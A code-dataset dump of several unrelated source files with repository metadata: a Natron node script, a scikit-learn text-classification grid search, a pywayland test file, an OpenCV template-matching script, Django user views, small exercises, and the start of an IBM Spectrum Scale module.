param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Controls.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep05 = param
del param
param = lastNode.createStringParam("sep06", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Controls.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep06 = param
del param
lastNode.Credits = lastNode.createPageParam("Credits", "Credits")
param = lastNode.createStringParam("sep101", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep101 = param
del param
param = lastNode.createStringParam("sep102", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep102 = param
del param
param = lastNode.createSeparatorParam("NAME", "bl_Bytes v1.0")
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setPersistent(False)
param.setEvaluateOnChange(False)
lastNode.NAME = param
del param
param = lastNode.createStringParam("sep103", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep103 = param
del param
param = lastNode.createStringParam("sep104", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep104 = param
del param
param = lastNode.createSeparatorParam("LINE01", "")
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setPersistent(False)
param.setEvaluateOnChange(False)
lastNode.LINE01 = param
del param
param = lastNode.createStringParam("sep105", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep105 = param
del param
param = lastNode.createStringParam("sep106", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep106 = param
del param
param = lastNode.createSeparatorParam("FR", "Version NATRON du Gizmo Nuke développé par Bertrand Lempereur")
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setPersistent(False)
param.setEvaluateOnChange(False)
lastNode.FR = param
del param
param = lastNode.createStringParam("sep107", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep107 = param
del param
param = lastNode.createStringParam("sep108", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep108 = param
del param
param = lastNode.createSeparatorParam("ENG", "NATRON version of Nuke Gizmo developed by Bertrand Lempereur")
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setPersistent(False)
param.setEvaluateOnChange(False)
lastNode.ENG = param
del param
param = lastNode.createStringParam("sep109", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep109 = param
del param
param = lastNode.createStringParam("sep110", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep110 = param
del param
param = lastNode.createSeparatorParam("CONVERSION", " (Fabrice Fernandez - 2018)")
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setPersistent(False)
param.setEvaluateOnChange(False)
lastNode.CONVERSION = param
del param
param = lastNode.createStringParam("sep111", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep111 = param
del param
param = lastNode.createStringParam("sep112", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Credits.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep112 = param
del param
# Refresh the GUI with the newly created parameters
lastNode.setPagesOrder(['Controls', 'Credits', 'Node', 'Settings'])
lastNode.refreshUserParamsGUI()
del lastNode
# Start of node "Output1"
lastNode = app.createNode("fr.inria.built-in.Output", 1, group)
lastNode.setLabel("Output2")
lastNode.setPosition(4139, 4252)
lastNode.setSize(80, 32)
lastNode.setColor(0.7, 0.7, 0.7)
groupOutput1 = lastNode
del lastNode
# End of node "Output1"
# Start of node "Source"
lastNode = app.createNode("fr.inria.built-in.Input", 1, group)
lastNode.setScriptName("Source")
lastNode.setLabel("Source")
lastNode.setPosition(4139, 3536)
lastNode.setSize(80, 32)
lastNode.setColor(0.3, 0.5, 0.2)
groupSource = lastNode
del lastNode
# End of node "Source"
# Start of node "Multiply1"
lastNode = app.createNode("net.sf.openfx.MultiplyPlugin", 2, group)
lastNode.setScriptName("Multiply1")
lastNode.setLabel("Multiply1")
lastNode.setPosition(4139, 3815)
lastNode.setSize(80, 32)
lastNode.setColor(0.48, 0.66, 1)
groupMultiply1 = lastNode
param = lastNode.getParam("value")
if param is not None:
param.setValue(4, 0)
param.setValue(4, 1)
param.setValue(4, 2)
param.setValue(4, 3)
del param
del lastNode
# End of node "Multiply1"
# Start of node "SeExprSimple1_2"
lastNode = app.createNode("fr.inria.openfx.SeExprSimple", 2, group)
lastNode.setScriptName("SeExprSimple1_2")
lastNode.setLabel("SeExprSimple1_2")
lastNode.setPosition(4139, 3892)
lastNode.setSize(80, 55)
lastNode.setColor(0.3, 0.5, 0.2)
groupSeExprSimple1_2 = lastNode
param = lastNode.getParam("rExpr")
if param is not None:
param.setValue("floor(r)")
del param
param = lastNode.getParam("gExpr")
if param is not None:
param.setValue("floor(g)")
del param
param = lastNode.getParam("bExpr")
if param is not None:
param.setValue("floor(b)")
del param
del lastNode
# End of node "SeExprSimple1_2"
# Start of node "Multiply2"
lastNode = app.createNode("net.sf.openfx.MultiplyPlugin", 2, group)
lastNode.setScriptName("Multiply2")
lastNode.setLabel("Multiply2")
lastNode.setPosition(4139, 3971)
lastNode.setSize(80, 32)
lastNode.setColor(0.48, 0.66, 1)
groupMultiply2 = lastNode
param = lastNode.getParam("value")
if param is not None:
param.setValue(0.25, 0)
param.setValue(0.25, 1)
param.setValue(0.25, 2)
param.setValue(0.25, 3)
del param
param = lastNode.getParam("premult")
if param is not None:
param.setValue(True)
del param
del lastNode
# End of node "Multiply2"
# Now that all nodes are created we can connect them together, restore expressions
groupOutput1.connectInput(0, groupMultiply2)
groupMultiply1.connectInput(0, groupSource)
groupSeExprSimple1_2.connectInput(0, groupMultiply1)
groupMultiply2.connectInput(0, groupSeExprSimple1_2)
param = groupMultiply1.getParam("value")
param.setExpression("pow(thisGroup.bytes.get(),2)", False, 0)
param.setExpression("pow(thisGroup.bytes.get(),2)", False, 1)
param.setExpression("pow(thisGroup.bytes.get(),2)", False, 2)
param.setExpression("pow(thisGroup.bytes.get(),2)", False, 3)
del param
param = groupMultiply2.getParam("value")
param.setExpression("1/pow(thisGroup.bytes.get(),2)", False, 0)
param.setExpression("1/pow(thisGroup.bytes.get(),2)", False, 1)
param.setExpression("1/pow(thisGroup.bytes.get(),2)", False, 2)
param.setExpression("1/pow(thisGroup.bytes.get(),2)", False, 3)
del param
try:
extModule = sys.modules["bl_BytesExt"]
except KeyError:
extModule = None
if extModule is not None and hasattr(extModule ,"createInstanceExt") and hasattr(extModule.createInstanceExt,"__call__"):
extModule.createInstanceExt(app,group)
|
[
"fabiof17pro@gmail.com"
] |
fabiof17pro@gmail.com
|
68973393fd246e8fd53093609d62eeb7f9232521
|
e4719910564b923cae492cf5f1ccd8590a6cda05
|
/app/08_gridsearch_bow_tfidf.py
|
717e7e60818dd7c4f0d8b5360dfd95fac2388a3a
|
[] |
no_license
|
ninnin-engineer/natural-language-classifier
|
4f4b8865fa8a0cb453ae96ba7db76a0565795979
|
2ca0d8799b7a0ec60e86c83017eb696cf5874625
|
refs/heads/master
| 2021-08-16T17:33:24.208039
| 2017-11-20T05:59:15
| 2017-11-20T05:59:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,495
|
py
|
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.pipeline import Pipeline
from preprocessings.tokenizer import MeCabTokenizer
from preprocessings.livedoor import load_df
# 01との比較でjanomeをmecabに変えた
# mecabでトークナイズ
# BOWで文をベクトル化
# LogisticRegressionで分類
# mecabでトークナイズ
mecab = MeCabTokenizer()
def tokenize(word):
tokens = [mecab.surface(token) for token in mecab.tokenize(word)]
return " ".join(tokens)
def tokenize_by_pos(word):
tokens = [mecab.surface(token) for token in mecab.tokenize(word) if mecab.exist_pos(token, ('動詞', '形容詞', '形容動詞', '名詞'))]
return " ".join(tokens)
# livedoorの記事をラベル付きでDataFrameとして読み込み
df = load_df()
# トレーニング:テスト = 9:1で分ける
X_train, X_test, Y_train, Y_test = train_test_split(df['docs'], df['labels'], test_size=0.1,random_state=3)
grid_list = [
# CountVectorizer, LogisticRegressionを検証
# CountVectorizer: tokenizer
# Logisticregression: penalty, C
{
'param_grid': {
'vect__ngram_range': [(1, 1)],
'vect__tokenizer': [tokenize, tokenize_by_pos],
'clf__penalty': ['l1', 'l2'],
'clf__C': [1.0, 10.0, 50.0, 100.0]
},
'pipeline': Pipeline([
('vect', CountVectorizer()),
('clf', LogisticRegression())
])
},
# TfidfVectorizer, LogisticRegressionを検証
# TfidfVectorizer: tokenizer, use_idf
# Logisticregression: penalty, C
{
'param_grid': {
'vect__ngram_range': [(1, 1)],
'vect__tokenizer': [tokenize, tokenize_by_pos],
'vect__use_idf': [True, False],
'clf__penalty': ['l1', 'l2'],
'clf__C': [1.0, 10.0, 50.0, 100.0]
},
'pipeline': Pipeline([
('vect', TfidfVectorizer()),
('clf', LogisticRegression())
])
},
]
for grid in grid_list:
gs = GridSearchCV(grid["pipeline"], grid["param_grid"], n_jobs = -1, cv = 10, scoring = 'accuracy', verbose = 1)
gs.fit(X_train, Y_train)
print('Best parameter set: %s' % gs.best_params_)
print('CV Accuracy: %.3f' % gs.best_score_)
clf = gs.best_estimator_
print('Test CV Accuracy: %.3f' % clf.score(X_test, Y_test))
|
[
"afujiwara2012@gmail.com"
] |
afujiwara2012@gmail.com
|
0fc1254b81c377e99f1de74727562858351c0a9d
|
172e4a0a42af7b6031e0755863765882844c12c9
|
/test/scanner_files/wl_destructor.py
|
869d151c5e4337b801d96cb6a5202b5d5d2153bd
|
[
"Apache-2.0"
] |
permissive
|
green-green-avk/pywayland
|
7020da05d46596a62185ad69e59c0e22633d4681
|
65aae61d5df320dc0c39d46761e44a4e34137bb2
|
refs/heads/main
| 2023-02-27T22:50:10.883373
| 2020-12-27T21:40:45
| 2020-12-27T21:40:45
| 337,197,445
| 1
| 0
|
Apache-2.0
| 2021-02-08T20:14:20
| 2021-02-08T20:14:19
| null |
UTF-8
|
Python
| false
| false
| 2,433
|
py
|
# This file has been autogenerated by the pywayland scanner
# Copyright 2015 Sean Vig
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pywayland.protocol_core import Argument, ArgumentType, Global, Interface, Proxy, Resource
class WlDestructor(Interface):
"""Destructor object
An interface object with a destructor request.
And a multiline description.
"""
name = "wl_destructor"
version = 1
class WlDestructorProxy(Proxy):
interface = WlDestructor
@WlDestructor.request(
Argument(ArgumentType.NewId, interface=WlDestructor),
Argument(ArgumentType.Int),
Argument(ArgumentType.Int),
Argument(ArgumentType.Int),
Argument(ArgumentType.Int),
Argument(ArgumentType.Uint),
)
def create_interface(self, x, y, width, height, format):
"""Create another interface
Create a :class:`WlDestructor` interface object
:param x:
:type x:
`ArgumentType.Int`
:param y:
:type y:
`ArgumentType.Int`
:param width:
:type width:
`ArgumentType.Int`
:param height:
:type height:
`ArgumentType.Int`
:param format:
:type format:
`ArgumentType.Uint`
:returns:
:class:`WlDestructor`
"""
id = self._marshal_constructor(0, WlDestructor, x, y, width, height, format)
return id
@WlDestructor.request()
def destroy(self):
"""Destroy the interface
Destroy the created interface.
"""
self._marshal(1)
self._destroy()
class WlDestructorResource(Resource):
interface = WlDestructor
class WlDestructorGlobal(Global):
interface = WlDestructor
WlDestructor._gen_c()
WlDestructor.proxy_class = WlDestructorProxy
WlDestructor.resource_class = WlDestructorResource
WlDestructor.global_class = WlDestructorGlobal
|
[
"sean.v.775@gmail.com"
] |
sean.v.775@gmail.com
|
2e1cb36c02ee08cfff40f3600c9b018391805cdc
|
cde520412b2df7d0594a25dfb111c5d0726936b5
|
/custTemplateMatching.py
|
97b59a4a36ed117baf1fa0fd4ddc7e5a66f49aac
|
[] |
no_license
|
SimonaMnv/Template-matching
|
782dcd5d61e24a8e7bd40c23ba54cd26e1de1937
|
a4bb1608c447e7ad8debb044aa2b6f598483f37b
|
refs/heads/master
| 2022-11-17T07:02:32.621325
| 2020-07-14T16:25:36
| 2020-07-14T16:25:36
| 279,632,942
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,117
|
py
|
import cv2
import numpy as np
import skimage
import sklearn
from skimage.color import label2rgb
from skimage.util import random_noise
from sklearn.cluster import estimate_bandwidth, MeanShift, MiniBatchKMeans
from matplotlib import pyplot as plt
from sklearn.metrics import jaccard_score
import os
import pandas as pd
#########################################
# SimonaMnv #
#########################################
def img_print(blabla, img):
cv2.namedWindow(blabla, cv2.WINDOW_NORMAL)
cv2.imshow(blabla, img)
# cv2.imwrite('resultimage0.jpg', img/255)
cv2.resizeWindow(blabla, 450, 450)
cv2.waitKey(0)
def color_hist_similarity(img_patch, target):
# Custom func that calculates the similarity based on color histogram
template_hist = cv2.calcHist([target], [0], None, [256], [0, 256])
patch_hist = cv2.calcHist([img_patch], [0], None, [256], [0, 256])
hist_score = cv2.compareHist(template_hist, patch_hist, 0) # img_patch histogram each time
return hist_score
def template_matching(img, target, thres):
height, width = img.shape[:2]
tar_height, tar_width = target.shape[:2]
NccValue = np.zeros((height - tar_height, width - tar_width))
loc = []
mask = np.ones((tar_height, tar_width, 3))
maxScores = []
# Create a sliding template-window
for m in range(0, height - tar_height):
for n in range(0, width - tar_width):
img_patch = img[m: m + tar_height, n: n + tar_width] # scan through the moving window
# img_print("Sliding Window", skimage.util.img_as_ubyte(img)) # check if the window moves
NccValue[m, n] = color_hist_similarity(img_patch, target) # calculate histogram of each image patch
if NccValue[m, n] > thres: # check if that patch is above the threshold
maxScores.append(NccValue[m, n])
offset = np.array((m, n)) # use the mask to spread out the box detection
img[offset[0]:offset[0] + mask.shape[0], offset[1]:offset[1] + mask.shape[1]] = mask
(max_Y, max_X) = (m, n)
loc.append((max_X, max_Y)) # appends backwards!
return loc, maxScores
def question2():
image = cv2.imread('images to use/9.JPG', cv2.IMREAD_COLOR)
image2 = cv2.imread('images to use/9.jpg',
cv2.IMREAD_COLOR) # the original has the mask above, so print a clear one
target = cv2.imread('images to use/9-template.jpg', cv2.IMREAD_COLOR)
height, width = target.shape[:2]
top_left, scores = template_matching(image, target, 0.80) # Set the threshold here!!!
for i in range(0, len(top_left)): # Print all the boxes found in the threshold range
loc = top_left[i]
cv2.rectangle(image2, loc, (loc[0] + width, loc[1] + height), (0, 0, 255), 3)
cv2.putText(image2, str(round(scores[i], 4)), (loc[0] + width - 100, loc[1] + height), cv2.FONT_HERSHEY_SIMPLEX,
0.6, (255, 255, 255), 2)
img_print("Object(s) detected", image2)
question1()
|
[
"noreply@github.com"
] |
SimonaMnv.noreply@github.com
|
bcb6789e91dca3a31da6ce95c94dfe06d763ddc8
|
219d7cf7cf00b778ff1a5709406c144fcf2132f3
|
/Conditional Statements Advanced - Exercise/02. Summer Outfit.py
|
3e7683abaeeaf4841c1a9928e49fd63839b68e7d
|
[] |
no_license
|
SilviaKoynova/Softuni-Programming-Basics-Python
|
e8e175419383815c65c4e110fdb2b752d940e887
|
0dfef0850f2cb8471dfee1af89f137be4e887cb8
|
refs/heads/main
| 2023-07-13T00:35:09.389302
| 2021-08-27T07:43:45
| 2021-08-27T07:43:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,598
|
py
|
degrees = int(input())
time_of_day = input()
outfit = ""
shoes = ""
if time_of_day == "Morning":
if 10 <= degrees <= 18:
outfit = "Sweatshirt"
shoes = "Sneakers"
print(f"It's {degrees} degrees, get your {outfit} and {shoes}.")
elif 18 < degrees <= 24:
outfit = "Shirt"
shoes = "Moccasins"
print(f"It's {degrees} degrees, get your {outfit} and {shoes}.")
elif degrees >= 25:
outfit = "T-Shirt"
shoes = "Sandals"
print(f"It's {degrees} degrees, get your {outfit} and {shoes}.")
elif time_of_day == "Afternoon":
if 10 <= degrees <= 18:
outfit = "Shirt"
shoes = "Moccasins"
print(f"It's {degrees} degrees, get your {outfit} and {shoes}.")
elif 18 < degrees <= 24:
outfit = "T-Shirt"
shoes = "Sandals"
print(f"It's {degrees} degrees, get your {outfit} and {shoes}.")
elif degrees >= 25:
outfit = "Swim Suit"
shoes = "Barefoot"
print(f"It's {degrees} degrees, get your {outfit} and {shoes}.")
elif time_of_day == "Evening":
if 10 <= degrees <= 18:
outfit = "Shirt"
shoes = "Moccasins"
print(f"It's {degrees} degrees, get your {outfit} and {shoes}.")
elif 18 < degrees <= 24:
outfit = "Shirt"
shoes = "Moccasins"
print(f"It's {degrees} degrees, get your {outfit} and {shoes}.")
elif degrees >= 25:
outfit = "Shirt"
shoes = "Moccasins"
print(f"It's {degrees} degrees, get your {outfit} and {shoes}.")
|
[
"noreply@github.com"
] |
SilviaKoynova.noreply@github.com
|
8fc5f3865f7a9e682236cc391b65ebcc74bec881
|
3a35b842a2f6ee3c1f5fcad1674b6a0adc587f8e
|
/games/simple_game.py
|
20829fca1412e8449ef739c48c8eac06708cc00d
|
[] |
no_license
|
nyquist/scorobot
|
fef3039a8cf9bc92bb216b2e29c2b5ebd2d31728
|
63b535da3bf0e1ef6ca9a216870061239748fddf
|
refs/heads/master
| 2021-08-10T13:56:42.540909
| 2020-06-01T15:12:27
| 2020-06-01T15:12:27
| 186,715,717
| 0
| 0
| null | 2020-05-16T21:57:14
| 2019-05-14T23:35:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,828
|
py
|
class Game:
def __init__(self, player1, player2):
self._players = (player1, player2)
self._scores = []
def get_players(self):
return self._players
def add_score(self, score1, score2):
self._scores.append((score1, score2))
def get_scores(self, last = False):
# when last = 0, return all
if not last:
return self._scores
else:
return self._scores[-last:]
@staticmethod
def _compute_stats(scores):
# W,D,L,GS,GC
player1 = [0,0,0,0,0]
player2 = [0,0,0,0,0]
for score in scores:
if score[0] > score[1]:
player1[0] = player1[0] + 1
player2[2] = player2[2] + 1
elif score[0] < score[1]:
player1[2] = player1[2] + 1
player2[0] = player2[0] + 1
else:
player1[1] = player1[1] + 1
player2[1] = player2[1] + 1
player1[3] = player1[3] + score[0]
player2[3] = player2[3] + score[1]
player1[4] = player1[4] + score[1]
player2[4] = player2[4] + score[0]
return (player1, player2)
def get_stats(self, last = False):
return self._compute_stats(self.get_scores(last))
if __name__ == '__main__':
game = Game("Player1", "Player2")
game.add_score(1,2)
game.add_score(2,2)
game.add_score(3,0)
game.add_score(5,2)
print("Players: {} - {}".format(game.get_players()[0], game.get_players()[1]))
print("Last Score: {}".format(game.get_scores(1)))
print("Last 2 Scores: {}".format(game.get_scores(2)))
print("All Scores: {}".format(game.get_scores()))
print("last 2 Stats: {}".format(game.get_stats(2)[0]))
print("All Stats: {}".format(game.get_stats()[0]))
|
[
"nyquist@vaspun.eu"
] |
nyquist@vaspun.eu
|
e60e93dc8ee4e16f58b48ba4f6a316213c517aec
|
cbc05b48b8d11656f45e88cd18574311ffd36c96
|
/User/views.py
|
b96b6e2faf7eb5e0f6916550e919f2c33da2e622
|
[
"Apache-2.0"
] |
permissive
|
asiLukas/Initter
|
5d2fa4099b4baa9ef1727282ccc70fe669bd24b7
|
d2ac53c487a182e63d96f99842dcce1d6df51b03
|
refs/heads/main
| 2023-01-11T10:41:02.678008
| 2020-11-05T14:46:14
| 2020-11-05T14:46:14
| 294,745,893
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,712
|
py
|
from django.shortcuts import render, redirect, get_object_or_404
from .forms import RegisterForm, UserProfileForm
from django.contrib.auth.forms import User
from Post.models import Post
from .models import UserProfile, Following
from django.db import IntegrityError
from django.contrib import messages
def register_view(request):
form = RegisterForm()
profile_form = UserProfileForm()
if request.method == 'POST':
form = RegisterForm(request.POST or None, request.FILES or None)
profile_form = UserProfileForm(request.POST or None, request.FILES or None)
if form.is_valid() and profile_form.is_valid():
user = form.save()
profile = profile_form.save(commit=False)
profile.user = user
profile.save()
return redirect('/login')
context = {
'form': form,
'profile_form': profile_form
}
return render(request, 'registration/register.html', context)
def register_update_view(request, username):
usr = get_object_or_404(User, username=username)
context = {}
form = RegisterForm(request.POST or None, request.FILES or None, instance=usr)
if form.is_valid():
form.save()
return redirect('/')
context['form'] = form
context['usr'] = usr
return render(request, 'user/register_update.html', context)
def profile_update_view(request, user):
usr = get_object_or_404(UserProfile, user=user)
context = {}
form = UserProfileForm(request.POST or None, request.FILES or None, instance=usr)
if form.is_valid():
form.save()
return redirect('/')
context['form'] = form
context['usr'] = usr
return render(request, 'user/profile_update.html', context)
def search_view(request):
obj = User.objects.all()
context = {
'user': obj
}
return render(request, 'user/search.html', context)
def profile_view(request, username):
user = get_object_or_404(User, username=username)
current_user = request.user
post = Post.objects.all()
followers = user.follower.filter().values('follower').count()
follows = user.follow.filter().values('follow').count()
follower_list = current_user.follow.all().filter().values('follower')
if {'follower': user.id} not in follower_list: # If user is not follower yet, he can follow else he can unfollow
follow = True
else:
follow = False
# follow twice exception
try:
if follow:
if request.method == 'POST':
Following.objects.create(follower=user, follow=current_user)
return redirect('/profile/%s' % user)
else:
if request.method == 'POST':
Following.objects.filter(follow=current_user, follower=user).delete()
return redirect('/profile/%s' % user)
except IntegrityError:
messages.warning(
request,
'someone tried to follow twice'
)
context = {
'profile_user': user,
'post': post,
'follow': follow,
'followers': followers,
'follows': follows,
}
return render(request, 'user/profile.html', context)
def followers_list_view(request, username):
usr = get_object_or_404(User, username=username)
obj = usr.follower.all()
context = {
'obj': obj,
'usr': usr
}
return render(request, 'follow/followers_list.html', context)
def follows_list_view(request, username):
usr = get_object_or_404(User, username=username)
obj = usr.follow.all()
context = {
'obj': obj,
'usr': usr
}
return render(request, 'follow/follows_list.html', context)
|
[
"asi_Lukas"
] |
asi_Lukas
|
d19b463e86008ff952d5ee6c80258f131fa615f4
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_239/ch29_2019_03_12_22_46_31_027718.py
|
0a91b242cf0a08ab8005d9647b93dbba8cf3a9b3
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 119
|
py
|
def calcula_aumento(salario):
if salario<=1250:
y=salario*1.15
else:
y=salario*1.1
return y
|
[
"you@example.com"
] |
you@example.com
|
02ed07edd6a45a00079416634e74fa31507a0492
|
b6b9ce4aca0a0509b71d513c52f4c5d7def7ae34
|
/eb-flask/flask_ES.py
|
8864ef706ddcf5b8a2d0cdb81391822a9b59e804
|
[] |
no_license
|
hongyangbai/AWS-tweetmap
|
9764445ce2a30fc4d8d687e0fc2e98f75624e741
|
12fbebdb32cad8adbfe8083ebcfc69ee276a5dd0
|
refs/heads/master
| 2021-01-10T10:03:55.067779
| 2016-03-06T20:58:24
| 2016-03-06T20:58:24
| 53,175,508
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,259
|
py
|
from flask import Flask, render_template,json, request
import requests
from flask.ext.googlemaps import GoogleMaps
# Constant
ES_addr = 'http://ec2-54-191-81-250.us-west-2.compute.amazonaws.com:9200'
application = Flask(__name__)
GoogleMaps(application)
res_count = requests.get(ES_addr + '/twitter/tweets/_count')
count_json = json.loads(res_count.text)
@application.route('/',methods=['POST'])
def run2():
dp_res = request.form['dropdown']
selected = dp_res
query = json.dumps({
"size":5000,
"query": {
"match": {
"text": dp_res
}
}
})
res_query = requests.get(ES_addr + '/twitter/tweets/_search?', data=query)
query_json = json.loads(res_query.text)
coord_list = []
for i in range(len(query_json['hits']['hits'])):
coord_list.append([query_json['hits']['hits'][i]['_source']['text']] + query_json['hits']['hits'][i]['_source']['coordinates'])
return render_template('tweet-map-home.html', count = count_json['count'], coord_list = coord_list, selected = selected)
@application.route('/', methods=['GET','POST'])
def home():
return render_template('tweet-map-home.html', count = count_json['count'], coord_list = [])
|
[
"hongyangbai@Hongyangs-MBP.fios-router.home"
] |
hongyangbai@Hongyangs-MBP.fios-router.home
|
25d54484715177328534d1b96f8f8c823512a2c5
|
487f2eee45d360a9f005d85f527e0e1a230d35c2
|
/xml_to_csv.py
|
248ded0db8c25f331af3e9e3b07d481b328b8daa
|
[] |
no_license
|
IceMeooow/object_detection
|
d58e73197386ba6943c64216e667429e9bfb12c5
|
983e71e235750a7c5d7e2219e88a0961d5716c58
|
refs/heads/master
| 2020-03-26T11:14:18.677292
| 2018-08-17T21:08:13
| 2018-08-17T21:08:13
| 144,834,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
import os
import glob
import pandas as pd
import xml.etree.ElementTree as ET
def xml_to_csv(path):
xml_list = []
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
for member in root.findall('object'):
value = (root.find('filename').text,
int(root.find('size')[0].text),
int(root.find('size')[1].text),
member[0].text,
int(member[4][0].text),
int(member[4][1].text),
int(member[4][2].text),
int(member[4][3].text)
)
xml_list.append(value)
column_name = ['filename', 'width', 'height', 'class', 'xmin', 'ymin', 'xmax', 'ymax']
xml_df = pd.DataFrame(xml_list, columns=column_name)
return xml_df
def main():
for directory in ['train_data', 'test_data']:
image_path = os.path.join(os.getcwd(), directory)
xml_df = xml_to_csv(image_path)
xml_df.to_csv('data/{}_labels.csv'.format(directory), index=None)
print('Successfully converted xml to csv.')
main()
|
[
"ik@tenviz.com"
] |
ik@tenviz.com
|
26aade0fb9cb31611fa25167297833d09053becf
|
120120e2f7ed014dac87cceb55a49a11344aea0c
|
/roles/custom_module/module_utils/ibm_ss_cluster_utils.py
|
7505db716878e2f062325c17bd6db275ef6436f7
|
[
"Apache-2.0"
] |
permissive
|
Perf-Org-5KRepos/ibm-spectrum-scale-install-infra
|
4d9ba3e04b6bae1681de0b8062b872e092513c58
|
6c070b41985b5fe0549ed88813a29a9d96df8480
|
refs/heads/master
| 2022-11-09T22:08:27.028901
| 2020-06-26T03:04:09
| 2020-06-26T03:04:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,060
|
py
|
#!/usr/bin/python
#
# Copyright 2020 IBM Corporation
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import time
from ibm_ss_utils import runCmd, parse_aggregate_cmd_output, \
parse_unique_records, GPFS_CMD_PATH, \
